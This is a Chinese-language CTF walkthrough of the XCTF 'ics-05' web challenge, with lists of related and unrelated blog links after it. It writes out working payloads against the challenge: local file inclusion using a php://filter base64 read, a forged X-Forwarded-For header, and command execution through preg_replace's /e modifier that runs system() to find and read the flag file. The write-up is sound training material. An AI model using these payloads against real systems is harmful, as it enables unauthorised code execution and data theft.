本文借鉴以下两篇文章的指导

https://www.jianshu.com/p/5a502873635b

https://blog.csdn.net/about23/article/details/95349625

全部点击一遍,只有这个可以有其他界面

题目描述是 “其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统”

在后面添加login.php 无果,御剑扫描也无结果,源码也找不到其他东西

再次点击上面的“云平台设备维护中心”,URL栏有参数?page=index  存在get传值

page的参数联想到可能存在文件包含漏洞

引用上面的文章内容

LFI漏洞的黑盒判断方法:

单纯的从URL判断的话,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼的时候,可能存在文件包含漏洞

输入数字没啥用,尝试读取index.php的源码,采用php伪协议





?page=php://filter/read=convert.base64-encode/resource=index.php




为什么中间要转base64编码,如果不转码,则相当于进行请求网页(继续打开网页)
输入payload得到一段base64




然后解码,分析源码




伪造XFF头来登入系统,同时利用preg_replace函数的漏洞


preg_replace( pattern , replacement , subject ) :


当pre_replace的参数pattern输入/e的时候 ,参数replacement的代码当作PHP代码执行
于是构造payload




/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=123




”+“号在url中会被解释成空格号,这里用%20也行


用burpsuite来设置XFF头




继续查看   %26被url解释成&号   用来连接命令


&& 前面命令为假直接报错,后面语句不执行(前面命令执行成功,后面的命令也执行)




index.php?pat=/123/e&rep=system("cd+./s3chahahaDir/flag%26%26ls")&sub=123






最后的payload




index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123






得flag


cyberpeace{a3f41e3943e9bd48b8084b29e4b27182}





												


											
攻防世界web之ics-05的更多相关文章
	

    
						
  1. CTF--web 攻防世界web题 robots  backup
		
    攻防世界web题 robots https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=506 ...
    
		
    2. 
						
  2. CTF--web 攻防世界web题 get_post
		
    攻防世界web题 get_post https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5 ...
    
		
    3. 
						
  3. 攻防世界 web进阶练习 NewsCenter
		
    攻防世界 web进阶练习 NewsCenter   题目是NewsCenter,没有提示信息.打开题目,有一处搜索框,搜索新闻.考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有 ...
    
		
    4. 
						
  4. XCTF攻防世界Web之WriteUp
		
    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...
    
		
    5. 
						
  5. 攻防世界web新手区
		
    攻防世界web新手区 第一题view_source 第二题get_post 第三题robots 第四题Backup 第五题cookie 第六题disabled_button 第七题simple_js  ...
    
		
    6. 
						
  6. XCTF攻防世界web进阶练习—mfw
		
    XCTF攻防世界web进阶练习-mfw题目为mfw,没有任何提示.直接打开题目,是一个网站 大概浏览一下其中的内容,看到其中url变化其实只是get的参数的变化查看它的源码,看到有一个?page=fl ...
    
		
    7. 
						
  7. 攻防世界Web刷题记录(进阶区)
		
    攻防世界Web刷题记录(进阶区) 1.baby_web 发现去掉URLhttp://111.200.241.244:51461/1.php后面的1.php,还是会跳转到http://111.200.2 ...
    
		
    8. 
						
  8. 攻防世界Web刷题记录(新手区)
		
    攻防世界Web刷题记录(新手区) 1.ViewSource 题如其名 Fn + F12 2.get post 3.robots robots.txt是搜索引擎中访问网站的时候要查看的第一个文件.当一个 ...
    
		
    9. 
						
  9. 攻防世界Web区部分题解
		
    攻防世界Web区部分题解   前言:PHP序列化就是把代码中所有的 对象 , 类 , 数组 , 变量 , 匿名函数等全部转换为一个字符串 , 提供给用户传输和存储 . 而反序列化就是把字符串重新转换为 ...
    
		
    10. 
						
  10. 攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup
		
    攻防世界 WEB 高手进阶区 csaw-ctf-2016-quals mfw Writeup 题目介绍 题目考点 PHP代码审计 git源码泄露 Writeup 进入题目,点击一番,发现可能出现git ...
    
		
    11. 
		

	


随机推荐
	

    
									
  1. Ubuntu18.04初始化
			
    Ubuntu18.04初始化 更新源: sudo cp /etc/apt/sources.list /etc/apt/sources.list.bak sudo gedit /etc/apt/sour ...
    
			
    2. 
						
  2. JVM-2-JVM结构
			
    什么是JVM        JVM是可运行Java代码的假想计算机 (或者理解为一种规范),包括一套字节码指令集.一组寄存器.一个栈.一个垃圾回收,堆 和 一个存储方法域.JVM是运行在操作系统之上的 ...
    
			
    3. 
						
  3. Vue中的导航守卫(路由守卫)
			
    当做Vue-cli项目的时候感觉在路由跳转前做一些验证,比如登录验证,是网站中的普遍需求. 对此,vue-router 提供的 beforeEach可以方便地实现全局导航守卫(navigation-g ...
    
			
    4. 
						
  4. IT兄弟连 HTML5教程 HTML5的曲折发展过程 浏览器之间的大战
			
    播放电影和音乐要使用播放器,浏览网页就需要使用浏览器.浏览器虽然只是一个设备,并不是开发语言,但在Web开发中必不可少,因为浏览器要去解析HTML5.CSS3和JavaScript等语言用于显示网页, ...
    
			
    5. 
						
  5. tomcat程序生成的日志文件不可读问题 - 运维总结
			
    现象描述:线上机器的程序文件(包括TOMCAT自身)使用APP账号作为属主运行,同时禁止了APP账号的BASH.登录系统使用了统一认证,这样每个人都有自己的账号登录系统.为了方便开发人员登录查看日志, ...
    
			
    6. 
						
  6. H3C DRNI学习
			
    DRNI:Distributed Resilient Network Interconnect,分布式弹性网络互连.DR:分布式聚合接口IPP:内部控制链路端口IPL:内部控制链路DRCP报文:分布式 ...
    
			
    7. 
						
  7. [01]从零开始学 ASP.NET Core 与 EntityFramework Core 课程介绍
			
    从零开始学 ASP.NET Core 与 EntityFramework Core 课程介绍 本文作者:梁桐铭- 微软最有价值专家(Microsoft MVP) 文章会随着版本进行更新,关注我获取最新 ...
    
			
    8. 
						
  8. [反汇编]函数开始部分利用mov ebx,esp找到返回地址(_KTRAP_FRAME结构)
			
    我们理解call原理,首先将返回地址压入栈中,之后执行调用. 因此,在一个函数开始部分,esp依旧是上一个栈帧的esp,此时esp指向返回地址. 这就意味着使用 mov ebx,esp,之后 [ebx ...
    
			
    9. 
						
  9. Caused by: org.springframework.data.mapping.PropertyReferenceException: No property id found for type Users!
			
    Spring Data JPA自定义Repository Caused by: org.springframework.data.mapping.PropertyReferenceException: ...
    
			
    10. 
						
  10. excel 知识备忘
			
    public void UpdateShapesColor(string value) { foreach (Microsoft.Office.Interop.Excel.Shape chart in ...
    
			
    11.